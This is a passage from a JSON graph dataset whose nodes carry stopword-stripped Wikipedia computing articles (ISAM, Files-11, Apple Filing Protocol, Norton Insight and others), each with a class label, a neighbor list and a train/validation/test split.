files calculating transferring differences on-the-fly therefore rdc suitable efficient synchronization files updated independently network bandwidth small scenarios files large differences small windows vista bluetooth stack improved support hardware ids edr performance improvements adaptive frequency hopping wi-fi co-existence synchronous connection oriented sco protocol support needed audio profiles windows vista bluetooth stack supports kernel mode device driver interface besides user-mode programming interface enables third parties add support additional bluetooth profiles sco sdp l2cap lacking windows xp service pack 2 built-in bluetooth stack entirely replaced third-party stack additional profile support also provides rfcomm support using sockets besides virtual com ports kb942567 called windows vista feature pack wireless adds bluetooth 2.1+edr support remote wake s3 s4 support self-powered bluetooth modules feature pack initially available oems eventually included windows vista service pack 2",
    "neighbors": [
      10243,
      1541,
      5643,
      4624,
      9234,
      1043,
      537,
      540,
      3102,
      1055,
      2079,
      9762,
      2083,
      8227,
      8740,
      1577,
      10281,
      1581,
      3629,
      4143,
      8238,
      9263,
      1077,
      2101,
      8246,
      1081,
      10812,
      5181,
      3648,
      8265,
      1098,
      7754,
      10828,
      4173,
      4174,
      10829,
      9808,
      10831,
      4178,
      9813,
      10839,
      603,
      9819,
      3170,
      617,
      5225,
      622,
      9839,
      4210,
      7796,
      4725,
      5749,
      1656,
      5754,
      4731,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      8841,
      6794,
      5259,
      9868,
      653,
      2193,
      9874,
      10900,
      11413,
      3224,
      4248,
      3742,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      10924,
      2221,
      10414,
      5300,
      7865,
      2749,
      8391,
      200,
      9420,
      3283,
      214,
      9434,
      10461,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      238,
      10991,
      8432,
      10993,
      7411,
      6904,
      3834,
      1791,
      8959,
      11519,
      6927,
      3856,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      9505,
      5413,
      2854,
      10024,
      3881,
      10026,
      10029,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      5952,
      3394,
      1348,
      10058,
      844,
      3922,
      11605,
      4439,
      5465,
      5469,
      5470,
      10079,
      5472,
      11616,
      2402,
      4458,
      6506,
      9593,
      6524,
      2943,
      10115,
      9609,
      1418,
      5003,
      5004,
      11677,
      10654,
      8607,
      929,
      11683,
      430,
      6062,
      2996,
      9655,
      6584,
      1978,
      10171,
      2493,
      960,
      8640,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      1498,
      5594,
      478,
      479,
      8161,
      6114,
      6115,
      2027,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      3573,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8392,
    "label": 8,
    "text": "URL_Subscription_Architecture:url subscription architecture url subscription architecture urlsa open system subscribing frequently updated digital content web blogs news stories private conversations designed alternative rss supports social subscribing private subscriptions rich content urlsa users subscribe users url content subscribed notified content url updated users typically maintain list subscriptions everything news stories conversations architecture allows users generate private content conversation photo album fly subscribe users fact urlsa content-less architecture users subscribe url content rather content means virtually type content addressable url made subscribable urlsa specifies strict protocol behavior followed creating updating cancelling subscriptions contrast rss data format architecturally urlsa activity happens two types independent applications subscription managers host user accounts content providers provide subscribable urls interact mainly via set well-defined web service calls user subscribes url subscription manager contacts url content provider establishes subscription urlsa user also subscribe another user url assuming subscribing user given permission user subscribes someone else url subscription manager contacts user subscription manager initiates subscribing mechanism behalf user user subscribed url content provider notify updates content url update happens content provider immediately pushes notification users subscribed url time user may unsubscribe url time updates cease interprocess communication urlsa conducted via web services exception updates transmitted udp datagrams reasons efficiency",
    "neighbors": [
      2945,
      10020,
      11413,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 8393,
    "label": 6,
    "text": "ISAM:isam isam acronym indexed sequential access method method creating maintaining manipulating indexes key-fields extracted random data file records achieve fast retrieval required file records ibm developed isam mainframe computers today term used several related concepts isam system data organized records composed fixed length fields records stored sequentially originally speed access tape system secondary set hash tables known indexes contain pointers tables allowing individual records retrieved without search entire data set departure contemporaneous navigational databases pointers data stored inside records key improvement isam indexes small searched quickly thereby allowing database access records needs additional modifications data require changes data table indexes question isam file created index nodes fixed pointers change inserts deletes occur later content leaf nodes change afterwards consequence inserts leaf node exceed node capacity new records stored overflow chains many inserts deletions table overflow chains gradually become large affects time required retrieval record relational databases easily built isam framework addition logic maintain validity links tables typically field used link foreign key indexed quick lookup slower simply storing pointer related data directly records also means changes physical layout data require updating pointers—the entry still valid isam simple understand implement primarily consists direct sequential access database file also inexpensive tradeoff client machine must manage connection file accesses turn leads possibility conflicting inserts files leading inconsistent database state typically solved addition client-server framework marshals client requests maintains ordering basic concept behind database management system dbms client layer underlying data store isam replaced ibm methodology called vsam virtual storage access method still later ibm developed db2 2004 ibm promotes primary database management system vsam physical access method used db2 openvms operating system uses files-11 file system conjunction rms record management services rms provides additional layer application files disk provides consistent method data organization access across multiple 3gl 4gl languages rms provides four different methods accessing data sequential relative record number access record file address access indexed access indexed access method reading writing data provides desired outcome fact file organized isam file appropriate previously defined keys access data via previously defined key extremely fast multiple keys overlapping keys key compression within hash tables supported utility define/redefine keys existing files provided records deleted although garbage collection done via separate utility isam developed time core memory scarce resource accordingly ibm designed system use minimum amount memory tradeoff channel control unit disk kept busier isam file consists collection data records two three levels index track index contains highest key disk track cylinder indexes cylinder index stores highest key cylinder disk address corresponding track index optional master index usually used large files contains highest key cylinder index track disk address cylinder index file loaded data records moved inserted records placed separate overflow area locate record key indexes disk searched complex self-modifying channel program increased busy time channel control unit disk increased physical virtual memory sizes later systems seen inefficient vsam developed alter tradeoff memory usage disk activity isam use self-modifying channel programs later caused difficulties cp-67 support os/360 since cp-67 copied entire channel program fixed memory i/o operation started translated virtual addresses real",
    "neighbors": [
      6147,
      4614,
      10632,
      11656,
      1805,
      7053,
      7312,
      10899,
      2068,
      9977,
      5401,
      7836,
      3230,
      11422,
      10413,
      10415,
      11187,
      10292,
      7477,
      2616,
      1464,
      1594,
      10040,
      6721,
      1219,
      11131,
      9286,
      8393,
      10958,
      8911,
      10065,
      7506,
      4563,
      8402,
      2901,
      3669,
      10072,
      7771,
      9565,
      736,
      6112,
      8290,
      7523,
      868,
      7272,
      4586,
      9835,
      7022,
      8559,
      10094,
      4598,
      6647,
      6521,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8394,
    "label": 3,
    "text": "LGA_1155:lga 1155 lga 1155 also called socket h2 socket used intel microprocessors based sandy bridge 2nd-gen 32nm 2k-series ivy bridge 3rd-gen 22nm 3k-series microarchitectures successor lga 1156 known socket h succeeded lga 1150 2013 lga 1155 1155 protruding pins make contact pads processor pins arranged 40×40 array 24×16 central void additional 61 omitted pins two adjoining central void six four corners 35 groups around perimeter yielding 1600 − 384 − 61 1155 pin count processors lga 1155 lga 1156 sockets compatible since different socket notches lga 1155 also marked beginning secure boot support later boards 4 holes fastening heatsink motherboard placed square lateral length 75 mm intel sockets lga 1156 lga 1155 lga 1150 lga 1151 cooling solutions therefore interchangeable cooling systems compatible lga 1155 lga 1156 sockets processors dimensions profile construction similar levels heat production sandy bridge chipsets except b65 q65 q67 support sandy bridge ivy bridge cpus bios upgrade sandy bridge based processors officially support ddr3-1333 memory however practice speeds ddr3-2133 tested work successfully h61 chipset supports one double-sided dimm memory module ram module per memory-channel therefore limited 16 gb instead 32 gb like others support h61-based motherboards four dimm slots four single-sided dimms installed ivy bridge chipsets motherboards support sandy bridge ivy bridge cpus ivy bridge based processors officially support ddr3-1600 ddr3-1333 sandy bridge consumer ivy bridge chipsets also allow overclocking k-series processors pcghx user wrote article website describing take uefi modules z97 motherboards use z77-motherboard make later support booting ssd using nvm express protocol instead ahci protocol article claims z97 motherboards first officially fully support nvme protocol als erstes gilt es die fraglichen module aus einem möglichst ähnlichen bios der z97-generation zu extrahieren dies ist die erste generation von mainboards die nvme-laufwerke nativ unterstützt mods described also work b75 chipset motherboards",
    "neighbors": [
      3588,
      5901,
      398,
      5523,
      4886,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      8625,
      9649,
      4537,
      7105,
      4805,
      7110,
      3403,
      4427,
      5073,
      4179,
      3798,
      4185,
      7002,
      9945,
      10715,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      4334,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Train"
  },
  {
    "node_id": 8395,
    "label": 2,
    "text": "Marshall_Kirk_McKusick:marshall kirk mckusick marshall kirk mckusick born january 19 1954 computer scientist known extensive work bsd unix 1980s freebsd present day president usenix association 1990 1992 2002 2004 still serves board editorial board acm queue magazine known friends colleagues kirk mckusick received b.s electrical engineering cornell university 2 m.s degrees 1979 1980 respectively ph.d. computer science university california berkeley 1984 mckusick openly gay lives california eric allman domestic partner since graduate school married october 2013 mckusick started bsd virtue fact shared office berkeley bill joy spearheaded beginnings bsd system largest contributions bsd file system helped design original berkeley fast file system ffs recently implemented soft updates alternative approach maintaining disk integrity crash power outage ffs revised version unix file system ufs known ufs2 magic number used ufs2 super block structure reflects mckusick birth date define fs_ufs2_magic 0x19540119 found /usr/include/ufs/ffs/fs.h freebsd systems included easter egg also primarily responsible creating complementary features filesystem snapshots background fsck file system check repair integrate closely soft updates filesystem snapshot filesystem brought immediately power outage fsck run background process design implementation series books regarded high-quality works computer science influential development bsd descendants bsd daemon often used identify bsd copyrighted marshall kirk mckusick",
    "neighbors": [
      2051,
      10761,
      2061,
      9743,
      8725,
      10774,
      2584,
      4636,
      9762,
      1071,
      1080,
      5177,
      9784,
      3651,
      7748,
      8266,
      5710,
      7249,
      9306,
      607,
      9320,
      8816,
      9844,
      633,
      8316,
      9343,
      6787,
      2180,
      4745,
      5771,
      4750,
      2212,
      684,
      5293,
      3248,
      1718,
      5819,
      7872,
      11459,
      10436,
      9927,
      8909,
      6864,
      726,
      10455,
      6361,
      8410,
      9452,
      11506,
      1273,
      7425,
      1801,
      274,
      1316,
      6438,
      10535,
      4908,
      1839,
      9009,
      11573,
      8504,
      8012,
      850,
      6491,
      7521,
      1891,
      873,
      7027,
      2421,
      2424,
      7552,
      5506,
      1927,
      7561,
      9625,
      1946,
      5534,
      927,
      11689,
      11698,
      2995,
      8631,
      1465,
      3006,
      9151,
      9153,
      3526,
      472,
      10202,
      3551,
      8671,
      998,
      4073,
      2545,
      3058,
      2035,
      5106,
      9201
    ],
    "mask": "None"
  },
  {
    "node_id": 8396,
    "label": 7,
    "text": "Portable_object_(computing):portable object computing distributed programming portable object object accessed normal method call possibly residing memory another computer portable sense moves machine machine irrespective operating system computer architecture mobility end goal many remote procedure call systems advantage portable objects easy use expressive allowing programmers completely unaware objects reside locations detractors cite fault naïve programmers expect network-related errors unbounded nondeterminism associated large networks",
    "neighbors": [
      9441,
      6694,
      10024,
      9932,
      7983,
      2481,
      5880,
      1724
    ],
    "mask": "Test"
  },
  {
    "node_id": 8397,
    "label": 9,
    "text": "Comparison_of_programming_languages_(functional_programming):comparison programming languages functional programming page provides comparison tables functional programming instructions programming languages comparison basic instructions imperative paradigm provided comparison basic instructions",
    "neighbors": [
      1931,
      6414,
      10510,
      6160,
      5521,
      3736,
      155,
      5917,
      5796,
      5806,
      9008,
      3765,
      7479,
      10043,
      10684,
      963,
      5830,
      5961,
      1610,
      1611,
      9804,
      8397,
      11212,
      11219,
      5588,
      7894,
      4057,
      10586,
      4069,
      7274,
      8554,
      6640,
      1016,
      3577,
      2557
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8398,
    "label": 4,
    "text": "Norton_Insight:norton insight norton insight whitelists files based reputation norton-branded antivirus software leverages data skip known files virus scans symantec claims quicker scans accurate detection use technology insight codenamed mr. clean initial aim help users determine programs internet safe install mr. clean would provide risk assessment discern safe malicious files however goal later changed making virus scans efficient instead scanning every file known files skipped cutting scanning times norton community watch voluntary anonymous service allows user norton product forward information symantec servers among data collected processes running sha256 values reappearing hash value corresponding file whitelisted norton insight checks processes user computer whitelist matching processes excluded scanning process trusted deemed safe excluded risk scanning two trust levels standard high third option disable norton insight standard trust processes appearing majority participants computers deemed safe high trust addition excludes digitally signed files scanning norton analyzes ntfs file system upon startup unaccounted changes found trust values processes system revoked case mistake revocation mechanism implemented clients receive list revoked sha256 values via liveupdate client file matching sha256 currently trusting file trust revoked file scanned norton file insight feature released norton 2010 products norton download insight feature provides insight files download install computer file insight give reputation information locates file computer well feature copies information users clipboard supports norton download insight feature assizes reputation file file insight window provides following information upon release download insight program would erroneously flags downloaded file digital signature version number therefore potential threat tech herald tested norton internet security 2009 found insight affected system performance whitelisting files scans publication also noted total number files scanned number trusted skipped files varied scan average amount time insight took scan 561 megabyte folder 21,816 clean files 0:00:24:41 despite oddities editor observed norton internet security 2009 faster subsequent products",
    "neighbors": [
      5512,
      6797,
      2193,
      7955,
      10903,
      6297,
      5924,
      2213,
      1708,
      7983,
      8368,
      2870,
      11065,
      7739,
      3520,
      2378,
      9569,
      10479,
      6643,
      10613,
      10872,
      8572,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 8399,
    "label": 4,
    "text": "Tiger_(security_software):tiger security software tiger security software unix-like computer operating systems used security audit tool host-based intrusion detection system supports multiple unix platforms tiger free gpl license unlike tools needs posix tools written entirely shell language tiger based set modular scripts run either together independently check different aspects unix system including review tiger originally developed douglas lee schales dave k. hess khalid warraich dave r. safford 1992 texas university three different forks evolved tiger tara developed advanced research computing tiger analytical research assistant one internally developed hp corporation bryan gartner last one developed debian gnu/linux distribution javier fernández-sanguino current upstream maintainer forks aimed making tiger work newer versions different unix operating systems forks merged may 2002 june 2002 new source code labeled 3.0 release published download section newly created savannah site following merge following releases published tiger interesting features including modular design easy expand used audit tool host-based intrusion detection system tool described program manpage tiger complements intrusion detection system ids network ids snort kernel log-based intrusion detection system lids snare linux systrace openbsd example integrity checkers many aide integrit samhain tripwire ... logcheckers providing framework work together checking system configuration status",
    "neighbors": [
      1474,
      10436,
      6092,
      7934,
      687,
      7983,
      11442,
      3796,
      5245,
      5397,
      823,
      5492,
      7192,
      413,
      3486
    ],
    "mask": "Test"
  },
  {
    "node_id": 8400,
    "label": 4,
    "text": "Cyber_and_Information_Domain_Service_(Germany):cyber information domain service germany cyber information domain service german cyber- und informationsraum cir youngest branch germany military bundeswehr decision form new military branch presented defense minister ursula von der leyen 26 april 2016 becoming operational 1 april 2017 headquarter cyber information domain service bonn november 2015 german ministry defense activated staff group within ministry tasked developing plans reorganization cyber military intelligence geo-information operative communication units bundeswehr 26 april 2016 defense minister ursula von der leyen presented plans new military branch public 5 october 2016 command staff became operational department within ministry defense 1 april 2017 cyber information domain service activated 6th branch bundeswehr cyber information domain service headquarters take command existing cyber military intelligence geo-information operative communication units command planned fully operational 2021 cids commanded chief cyber information domain service german inspekteur des cyber- und informationsraum inspcir three-star general position based bonn",
    "neighbors": [
      1373
    ],
    "mask": "None"
  },
  {
    "node_id": 8401,
    "label": 7,
    "text": "Transparency_(human–computer_interaction):transparency human–computer interaction change computing system new feature new component transparent system change adheres previous external interface much possible changing internal behaviour purpose shield change systems human users end interface confusingly term refers overall invisibility component refer visibility component internals white box open system term transparent widely used computing marketing substitution term invisible since term invisible bad connotation usually seen something user ca n't see control term transparent good connotation usually associated hiding anything vast majority times term transparent used misleading way refer actual invisibility computing process misleading counter-intuitive definition modern computer literature tends prefer use agnostic transparent term used particularly often regard abstraction layer invisible either upper lower neighbouring layer also temporarily used later around 1969 ibm honeywell programming manuals term referred certain computer programming technique application code transparent clear low-level detail device-specific management contained logic solving main problem achieved encapsulation – putting code modules hid internal details making invisible main application example network file system transparent introduces access files stored remotely network way uniform previous local access file system user might even notice using folder hierarchy early file transfer protocol ftp considerably less transparent requires user learn access files ftp client similarly file systems allow transparent compression decompression data enabling users store files medium without special knowledge file systems encrypt files transparently approach require running compression encryption utility manually software engineering also considered good practice develop use abstraction layers database access application work different databases abstraction layer allows parts program access database transparently see data access object example object-oriented programming transparency facilitated use interfaces hide actual implementations done different underlying classes transparency means form distributed system hide distributed nature users appearing functioning normal centralized system many types transparency formal definitions concepts found rm-odp open distributed processing reference model iso 10746 degree properties achieved may vary widely every system hide everything users instance due existence fixed finite speed light always latency accessing resources distant user one expects real-time interaction distributed system may noticeable",
    "neighbors": [
      9762,
      6403,
      7364,
      5614,
      2901,
      11644,
      1049,
      1978,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 8402,
    "label": 6,
    "text": "Files-11:files-11 files-11 also known on-disk structure file system used digital equipment corporation openvms operating system also simpler form older rsx-11 hierarchical file system support access control lists record-oriented i/o remote network access file versioning files-11 similar significantly advanced file systems used previous digital equipment corporation operating systems tops-20 rsts/e native openvms file system descended older dec operating systems similar many ways designed dave cutler major difference layout directories file systems provided form rudimentary non-hierarchical directory structure typically based assigning one directory per user account rsts/e user account represented two numbers project programmer pair one associated directory special system files program executables os stored directory reserved system account suitable pdp-11 systems possessed limited permanent storage capacity vax systems much larger hard drives required flexible method file storage hierarchical directory layout particular notable improvement ods-2 files-11 general term five separate file systems known on-disk structure ods levels 1 5 ods-1 flat file system used rsx-11 os supported older vms systems rsx compatibility never used support vms largely superseded ods-2 ods-5 ods-2 standard vms file system remains common file system system disks disk operating system installed although seldom referred ods level designations ods-3 ods-4 files-11 support cd-rom iso 9660 high sierra format file systems respectively ods-5 extended version ods-2 available alpha ia-64 platforms adds support case-preserving filenames non-ascii characters improvements hierarchical directory support originally intended file serving microsoft windows non-vms systems part nt affinity project also used user disks internet servers files directories files-11 file system contained inside one parent directories eventually root directory master file directory see file system therefore organised directed acyclic graph dag structure example see right file 2 directory entry dir 2 dir 3 directories simultaneously even removed one would still exist directory removed also similar concept hard links unix although care must taken file actually deleted disks set hard links available ods-5 disks disk hard links enabled operational vms system access one online disks contains complete independent file system either local storage case cluster storage shared remote systems openvms cluster configuration non-private disks shared nodes cluster see figure 1 configuration two system disks accessible nodes via network private disk shared mounted use particular user process machine access files across cluster managed openvms distributed lock manager integral part file system multiple disks combined form single large logical disk volume set disks also automatically replicated shadow sets data security faster read performance disk identified either physical name often user-defined logical name example boot device system disk may physical name 3 dka100 generally referred logical name sys sysdevice file systems disk exception ods-1 hierarchical fully specified filename consists nodename username password device name directory filename file type version number format example dir1.dir2.dir3 file.ext refers latest version file.ext current default disk directory dir1.dir2.dir3 dir1 subdirectory master file directory mfd root directory dir2 subdirectory dir1 disk mfd identified 000000 parts filename omitted case taken current default file specification default file specification replaces concept current directory operating systems providing set defaults node device name directory processes default file specification includes disk name directory vms file system routines accept default file specification also include file type type command example defaults .lis file type command type f extension attempts open file f.lis every file version number defaults 1 versions filename present otherwise one higher greatest version every time file saved rather overwriting existing version new file name incremented version number created old versions deleted explicitly delete purge command optionally older versions file deleted automatically file version limit reached set set file/version_limit old versions thus overwritten kept disk may retrieved time architectural limit version numbers 32767 versioning behavior easily overridden unwanted particular files directly updated databases create new versions unless explicitly programmed ods-2 limited eight levels subdirectories uppercase alphanumeric names plus underscore dash dollar sign 39.39 characters 39 filename another 39 extension ods-5 expands character set lowercase letters printable ascii characters well iso latin-1 unicode characters increases maximum filename length allows unlimited levels subdirectories constructing pathname ods-5 file uses characters allowed ods-2 special syntax used preserve backwards compatibility file file.tar.gz 1 ods-5 disk example would referred file^.tar.gz —the file name file.tar extension .gz vms file security defined two mechanisms uic-based access control acl-based access control uic access control based owner file uic user accessing file access determined four groups permissions four permission bits system access applies user whose uic group code less equal sysgen parameter maxsysgroup typically 8 10 octal example system user owner group apply owner file user user group world applies user also fifth permission bit control used determine access change file metadata protection group set explicitly always set system owner never group world uic-based access control also affected four system privileges allow users holding override access controls acls allow additional privileges assigned user– group–specific basis example web server uic could granted read access files particular directory acls marked inherited directory file acl applies files underneath acls modified using edit/acl command take form identifier/access pairs example acl entry would allow user http server read execute file logical name system variable may reference disk directory file contain program-specific information example logical sys sysdevice contains system boot device logical name normally refers single directory disk e.g sys login user login home directory directories logicals used true disk names—sys login dir file valid file specification however concealed logical names defined define/translation=concealed used way rooted directories defined trailing directory specification hence would allow home dir file used common simple logicals point specific directories associated application software may located disk directory hence logical abc_exe may point directory executable programs application abc abc_temp may point directory temporary files application directory may disk directory tree abc_exe could somewhere another disk different directory tree logical names close equivalent posix operating systems resemble unix environment variables except expanded file system instead command shell application program must defined use common many logical names defined system startup command file well user login command files vms logical names may reference logical names predefined nesting limit 10 may contain lists names search existing filename frequently referenced logical names closest non-dec operating system support concept logical names amigaos assign command amigaos disk operating system amigados port tripos bears resemblance dec operating systems example physical device names follow pattern like df0 first floppy disk cdrom2 3rd cd-rom drive etc however since system boot attached drive operating system creates sys assignment automatically reference boot device used assignments libs prefs c et al also made referenced sys users course allowed create destroy assignments record management services structured i/o layer vms operating system rms provides comprehensive program support managing structured files record-based indexed database files vms file system conjunction rms extends files access past simple byte-streams allows os-level support variety rich files types file vms file system may thought database containing series records one individual fields text file example list records lines separated newline character rms example record-oriented filesystem four record formats defined rms four record access methods methods retrieve extant records files disk level ods represents file system array blocks block 512 contiguous bytes one physical disk volume disk blocks assigned clusters originally 3 contiguous blocks later increased larger disk sizes file disk ideally entirely contiguous i.e blocks contain file sequential disk fragmentation sometimes require file located discontiguous clusters case fragments called 'extents disks may combined disks form volume set files stored anywhere across set disks larger disk sizes reduced use volume sets management single physical disk simpler every file files-11 disk volume set unique file identification fid composed three numbers file number num file sequence number seq relative volume number rvn num indicates indexf.sys file see metadata file located seq generation number incremented file deleted another file created reusing indexf.sys entry dangling references old file accidentally point new one rvn indicates volume number file stored using volume set structural support ods volume provided directory file —a special file containing list file names file version numbers associated fids similar vsam catalogs mvs root directory structure master file directory mfd root directory contains directly indirectly every file volume top level ods file system master file directory mfd contains top-level directory files including several system files used store file system information ods-1 volumes two-level directory structure used user identification code uic associated user file directory ufd form group.user ods-2 later volumes layout directories mfd free-form subject limit nesting directories 8 levels ods-2 unlimited ods-5 multi-volume sets mfd always stored first volume contains subdirectories volumes following system files present ods mfd note file system implementation refer files name file ids always values thus indexf.sys always file num 1 seq 1 index file contains basic information files-11 volume set two organizations indexf.sys traditional organization organization used disks gpt.sys guid partition table gpt structures traditional organization block 1 boot block contains location primary bootstrap image used load vms operating system always located logical block 0 disk hardware firmware read block always present even non-system non-bootable volumes boot block primary home block contains volume name location extents comprising remainder index file volume owner uic volume protection information normally several additional copies home block known secondary home blocks allow recovery volume lost damaged disks gpt.sys gpt.sys contains equivalent boot block known master boot record mbr primary home block home blocks present gpt-based disk alternate home blocks structures included indexf.sys blocks indexf.sys file unused rest index file composed file headers describe extents allocated files residing volume file metadata owner uic acls protection information file described one file headers—more one required file large number extents file header fixed-length block contains fixed– variable–length sections possible map acl sections header contained completely primary header however acl long file contains many extents enough space primary header store case extension header allocated store overflow information file header begins 4 offsets idoffset mpoffset acoffset roffset since size areas fixed-length header may vary map acl areas offsets required locate additional areas offset number 16-bit words beginning file header beginning area file requires multiple headers extension segment number segnum contains sequence number header beginning 0 first entry indexf.sys struclev contains current structure level high byte version low byte file system ods-2 structure level 2 increase version number indicates backwards-compatible change older software may ignore changes structure level incompatible w_fid containing three values fid_num fid_seq fid_rvn corresponding file sequence relative volume number contains id file ext_fid composed three values holds location next extension header values rvn specified 0 represent current volume 0 normally valid rvn filechar contains several flags affect file handled organised accmode describes privilege level process must running order access file vms defines four privilege levels user supervisor exec kernel type access read write execute delete encoded 2-bit integer fileprot contains discretionary access control information file divided 4 groups 4 bits system owner group world bit 0 corresponds read access 1 write 2 execute 3 delete setting bit denies particular access group clearing allows file header extension header backlink contains file id primary header otherwise contains file id directory file containing primary entry file",
    "neighbors": [
      5120,
      2051,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      3142,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      7847,
      1193,
      10405,
      5293,
      7344,
      8369,
      6837,
      2230,
      5816,
      1212,
      8380,
      6846,
      10951,
      8393,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      8414,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      273,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3366,
      3368,
      9004,
      302,
      7983,
      6961,
      1844,
      3909,
      2378,
      4431,
      10580,
      2901,
      11604,
      346,
      2395,
      2397,
      10590,
      10596,
      6519,
      376,
      11128,
      890,
      2432,
      7554,
      8075,
      7053,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      11187,
      1464,
      1978,
      6075,
      8643,
      7126,
      7134,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 8403,
    "label": 4,
    "text": "Hacker_Bible:hacker bible hacker bible publication german hacker organization chaos computer club ccc published two editions date 1985 1988 edited wau holland published grüne kraft press hacker bible compendium documents stories hacker scene example instruction guide acoustic coupler named “ data-loo ” germ. datenklo furthermore offers manuals technical explanations first edition appeared 1985 subtitle “ cable salad good kabelsalat ist gesund ” sold 25,000 copies mid-1988 second edition 1988 given additional name “ new testament ” comic images cover sleeve creation german comic artists mali beinhorn werner büsch comic workshop büsch-beinhorn production distribution hacker bible discontinued 1990 since 1999 ccc offered scanned full-text version online german materials texts peter glaser documentation karl koch works tron chaos-cd",
    "neighbors": [
      4956
    ],
    "mask": "None"
  },
  {
    "node_id": 8404,
    "label": 6,
    "text": "Apple_Filing_Protocol:apple filing protocol apple filing protocol afp formerly appletalk filing protocol proprietary network protocol part apple file service afs offers file services macos classic mac os macos afp one several file services supported others including server message block smb network file system nfs file transfer protocol ftp webdav afp currently supports unicode file names posix access control list permissions resource forks named extended attributes advanced file locking mac os 9 earlier afp primary protocol file services afp versions 3.0 greater rely exclusively tcp/ip port 548 427 establishing communication supporting appletalk service discovery protocol afp 2.x family supports tcp/ip using data stream interface appletalk communication service discovery many third-party afp implementations use afp 2.x thereby supporting appletalk connection method still earlier versions rely exclusively appletalk reason older literature refers afp appletalk filing protocol literature may refer afp appleshare name mac os 9 earlier afp client notable current compatibility topics early implementations afp server software available mac os starting system 6 appleshare appleshare ip early 1.x releases mac os x server client operating systems afp called personal file sharing supported ten simultaneous connections afp implementations relied version 1.x 2.x protocol appleshare ip 5.x 6.x 1.x releases mac os x server introduced afp version 2.2 first version offer transport connections using tcp/ip well appletalk also increased maximum share point size four gibibytes two tebibytes although maximum file size could stored remained two gibibytes due limitations original mac os changes made afp since version 3.0 represent major advances protocol introducing features designed specifically mac os x clients however like appleshare client original mac os afp client mac os x continues support type creator codes along filename extensions afp 3.0 introduced mac os x server 10.0.3 used mac os x server 10.1.5 first version use unix-style posix permissions model unicode utf-8 file name encodings version 3.0 supported maximum share point file size two tebibytes maximum file size volume size mac os x version 10.2 note maximum file size changed version 2.2 described afp 3.0 31 bytes maximum length filename sent afp afp 3.1 introduced mac os x server version 10.2. notable changes included support kerberos authentication automatic client reconnect nfs resharing secure afp connections via secure shell ssh maximum share point file size increased 8 tebibytes mac os x server 10.2 16 tebibytes mac os x server 10.3 afp 3.2 adds support access control lists extended attributes mac os x server 10.4 maximum share point size least 16 tebibytes although apple published limits document mac os x server 10.4 afp 3.2+ introduced mac os x leopard adds case sensitivity support improves support time machine synchronization lock stealing sleep notifications afp 3.3 mandates support replay cache functionality required time machine afp 3.4 introduced os x mountain lion includes minor change mapping posix errors afp errors see apple developer documentation afp version differences mac os x tiger users connect afp servers browsing network globe entering afp uniform resource locator url connect server dialog mac os x leopard later releases afp shares displayed finder side-bar afp urls take form afp // server share server server ip address domain name system dns name bonjour name share name share point snow leopard later url form afp // server share path used mount subdirectory underneath share point macos also offers personal file sharing light implementation current version afp mac os x 10.4 users share contents public folders checking personal file sharing sharing section system preferences afp urls appletalk servers took form afp //at/ appletalk name appletalk zone networks without appletalk zones asterisk would substituted zone name third party server implementations afp available number companies",
    "neighbors": [
      5120,
      2564,
      9734,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      9784,
      7225,
      11323,
      576,
      8772,
      1109,
      3167,
      4708,
      10341,
      9836,
      7789,
      9844,
      9333,
      6263,
      9335,
      9343,
      5256,
      7818,
      654,
      2193,
      2194,
      2197,
      7318,
      2199,
      11419,
      6309,
      1190,
      5286,
      168,
      10405,
      5293,
      1712,
      3248,
      3250,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      7364,
      6855,
      10951,
      9420,
      3280,
      7378,
      3795,
      4819,
      8402,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      8441,
      3834,
      3328,
      11011,
      11012,
      2314,
      8461,
      6416,
      1810,
      2322,
      5397,
      6935,
      11033,
      287,
      1825,
      6434,
      11554,
      5413,
      3368,
      4907,
      9004,
      302,
      7984,
      6961,
      6963,
      1844,
      823,
      6970,
      11581,
      11072,
      3909,
      2887,
      2378,
      4431,
      5969,
      6993,
      346,
      2395,
      4954,
      2397,
      10596,
      2407,
      10087,
      4457,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      9625,
      5531,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      942,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      6098,
      7126,
      10202,
      2015,
      1509,
      5093,
      9189,
      4074,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8405,
    "label": 1,
